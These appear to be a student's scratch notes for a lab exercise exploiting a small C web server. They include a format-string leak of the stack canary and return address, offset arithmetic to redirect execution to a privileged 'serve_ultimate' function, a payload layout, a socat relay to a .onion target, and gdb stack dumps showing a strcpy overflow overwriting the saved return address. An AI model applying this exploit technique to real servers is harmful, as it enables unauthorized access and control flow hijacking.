

MAGIC NUMBERS: 2184 232

Important: extract offsets from *linux02*

Useful Commands:

$ socat -d -d -d TCP-LISTEN:8000,fork SOCKS4A:localhost:zwt6vcp6d5tao7tbe3je6a2q4pwdfqli62ekuhjo55c7pqlet3brutqd.onion:80,socksport=9150

$ make && mv server ys13server && gdb ./ys13server --command=commands.gdb && kill -9 `pgrep -f "ys13server"`

----------------------------------------------------------------------

target stack: 0xffffd740   --- known stack: 0xffffd8c8

ffffd828

392

target serve ultimate: 0x5655689d  --- known address : 56556015  : 0x56555f91

2316



check auth: expected return addr -> 0x5655689d

check auth : $ python3 create_request_auth.py 31 %x 8000 1 | socat - TCP4:localhost:8000
            31st address is the expected auth return address



serve_ultimate : addr --> 0x5655717d




0x5655717d - 0x5655689d = 0x8E0 = 2272 dec


so... : fixed_point_addr + 0x8e0 = serve_ult_address


local (harry) magic nums: 2272 232


python3 create_request_auth.py 31 %x 8000 1 | socat - TCP4:localhost:8000
27 (actual canary) 28 (other val) 29 (other val) 30 (other val) 31 (return address)



so...

payload = (RANDOM NOISE) + (MULT) * (27 + 28 + 29 + 30 + (31 +0x8e0))


Remember : substitute \x00 with &



Before:
0xffffcd40:     0xffffcda8      0xf7cf4000      0xffffcd78      0x565580ae
0xffffcd50:     0x5655d1a0      0x00000064      0x5655d1a0      0x56556b63
0xffffcd60:     0x32333865      0x62373236      0x00000001      0xc8b7dc00
0xffffcd70:     0x56559f10      0xf7ffb000      0xffffce18      0x565569ab
0xffffcd80:     0x565580ae      0xffffcda8      0x00000001      0x56556850
0xffffcd90:     0x00050000      0x00000000      0x5655a0d8      0xf7cf4000
0xffffcda0:     0xf7cf4d20      0x000006c0      0x74736574      0xf7b80000
0xffffcdb0:     0xf7cf4d20      0x00000000      0x00000000      0xf7b43784
(gdb) info frame
Stack level 0, frame at 0xffffcd80:
 eip = 0x56556fed in post_param (main.c:179); saved eip = 0x565569ab
 called by frame at 0xffffce20
 source language c.
 Arglist at 0xffffcd3c, args: param_name=0x565580ae "admin_pwd"
 Locals at 0xffffcd3c, Previous frame's sp is 0xffffcd80
 Saved registers:
  ebx at 0xffffcd70, ebp at 0xffffcd78, esi at 0xffffcd74, eip at 0xffffcd7c
(gdb) 

After strcpy:
0xffffcd30:     0x696d6461      0x77705f6e      0xbbbb3d64      0xbbbbbbbb
0xffffcd40:     0xbbbbbbbb      0xbbbbbbbb      0xbbbbbbbb      0xbbbbbbbb
0xffffcd50:     0xbbbbbbbb      0xbbbbbbbb      0xbbbbbbbb      0xbbbbbbbb
0xffffcd60:     0xbbbbbbbb      0xbbbbbbbb      0xbbbbbbbb      0x923ec226
0xffffcd70:     0xf7cf4d20      0x56559f10      0xffffce18      0x5655717d
0xffffcd80:     0x56558000      0xffffcda8      0x00000001      0x56556850
0xffffcd90:     0x00050000      0x00000000      0x5655a0d8      0xf7cf4000
0xffffcda0:     0xf7cf4d20      0x000006c0      0x74736574      0xf7b80000




/////////////////


(gdb) x/32x $sp
0xffffcd40:     0xffffcda8      0xf7cf4000      0xffffcd78      0x565580ae
0xffffcd50:     0x5655d1a0      0x00000064      0x5655d1a0      0x56556b63
0xffffcd60:     0x32333865      0x62373236      0x00000001      0xde0f2500
0xffffcd70:     0x56559f10      0xf7ffb000      0xffffce18      0x565569ab
0xffffcd80:     0x565580ae      0xffffcda8      0x00000001      0x56556850
0xffffcd90:     0x00050000      0x00000000      0x5655a0d8      0xf7cf4000
0xffffcda0:     0xf7cf4d20      0x000006c0      0x74736574      0xf7b80000
0xffffcdb0:     0xf7cf4d20      0x00000000      0x00000000      0xf7b43784
(gdb) 


Stack level 0, frame at 0xffffcd80:
 eip = 0x56557066 in post_param (main.c:180); saved eip = 0x565569ab
 called by frame at 0xffffce20
 source language c.
 Arglist at 0xffffcd2c, args: param_name=0x565580ae "admin_pwd"
 Locals at 0xffffcd2c, Previous frame's sp is 0xffffcd80
 Saved registers:
  ebx at 0xffffcd70, ebp at 0xffffcd78, esi at 0xffffcd74, eip at 0xffffcd7c
(gdb) 


